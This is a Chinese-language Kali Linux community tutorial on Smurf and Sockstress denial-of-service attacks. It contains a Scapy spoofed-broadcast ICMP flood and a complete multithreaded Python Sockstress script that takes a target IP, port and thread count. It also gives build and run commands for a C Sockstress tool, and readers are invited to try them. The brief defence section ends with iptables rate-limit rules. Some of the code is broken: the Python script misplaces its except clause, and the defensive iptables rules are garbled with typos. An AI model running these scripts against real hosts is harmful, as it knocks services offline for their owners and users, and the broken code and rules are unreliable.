Smurf攻击、Sockstress-Kali Linux社区-电脑端-X黑手网
X黑手网
点击查看-X黑手网
点击查看-X黑手网

Smurf攻击、Sockstress

Smurf攻击

  • 世界上最古老的DDoS攻击技术

    • 向广播地址发送伪造源地址的ICMP echo Request(ping)包

    • LAN所有计算机向伪造源地址返回响应包

    • 对现代操作系统已经失效(不响应目标为广播的ping)

Scapy

i=IP()
i.dst="1.1.1.255"
p=ICMP()
p.display()
r=(i/p)
send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
  • 这个不演示了,仅仅当作学习原理,大家自己可以尝试下

 

 

Sockstress

  • 2008年由Jack C.Louis发现

  • 针对TCP服务的拒绝服务攻击

    • 消耗被攻击目标系统资源

    • 与攻击目标建立大量socket链接

    • 完成三次握手,最后的ACK包window大小为0(客户端不接受数据)

    • 攻击者资源消耗小(CPU、内存、带宽)

    • 异步攻击,单机可拒绝服务高配资源服务器

    • Window窗口实现的TCP流控

 

脚本如下:

#! /usr/bin/python
# -*- coding: utf-8 -*-

from scapy.all import *
from time import sleep
import thread
import logging
import os
import signal
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

if len(sys.argv) != 4:
    print "用法:./syn_flood.py [IP地址] [端口] [线程数]"
    print "举例:./syn_flood.py 1.1.1.1 80 20 ## 请确定被攻击端口处于开放状态"
    sys.exit()

target = str(sys.argv[1])
dstport = int(sys.argv[2])
threads = int(sys.argv[3])

## 攻击函数
def sockstress(target,dstport):
    while 0 == 0:
        try:
            x = random.randint(0,65535)
            response = sr1(IP(dst=target)/TCP(sport=x,dport=dstport,flags ='S'),timeout=1,verbose=0)
            send(IP(dst=target)/ TCP(dport=dstport,sport=x,window=0,flags='A',ack=(response[TCP].seq + 1))/'\x00\x00',verbose=0)
            except:
                pass

## 停止攻击函数
def shutdown(signal, frame):
    print '正在恢复 iptables 规则'
    os.system('iptables -D OUTPUT -p TCP --tcp-flags RST RST -d ' + target + ' -j DROP')
    sys.exit()

## 添加iptables规则
os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d ' + target + ' -j DROP')
signal.signal(signal.SIGINT,shutdown)

##多线程攻击
print "\n攻击正在进行...按Ctrl+C停止攻击"
for X in range(0,threads):
    thread.start_new_thread(sockstress, (target,dstport))

##永远执行
while 0 == 0:
    sleep(1)

自己去执行尝试即可,这里不做详细演示;

 

C攻击脚本

  • https://github.com/defuse/sockstress

  • gcc -Wall -c sockstress.c

image

  • gcc -pthread -o sockstress sockstress.o

image

  • ./sockstress 1.1.1.1:80 eth0

  • ./sockstress 1.1.11:80 eth0 -p payloads/http

image

防火墙规则:(用C的话提前写这个防火墙规则)

iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP

 

防御措施

  • 直到今天sockstress攻击仍然是一种有效的DoS攻击方式

  • 由于建立完成的TCP三步握手,因此使用syn cookie防御无效

  • 根本的防御方法是采用白名单(不实际)

  • 折中对策:限制单位时间内每IP建立的TCP连接数

    • 封杀每30秒与80端口建立连接超过10个的IP地址

iptables -l INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
iptables -l INPUI -P tcp --dport 80 -m state --state NEW -m recent -- update --seconds 30 --hitcount 10 -j DROP

 

  • 以上规则对DDoS攻击无效 

请登录后发表评论

    没有回复内容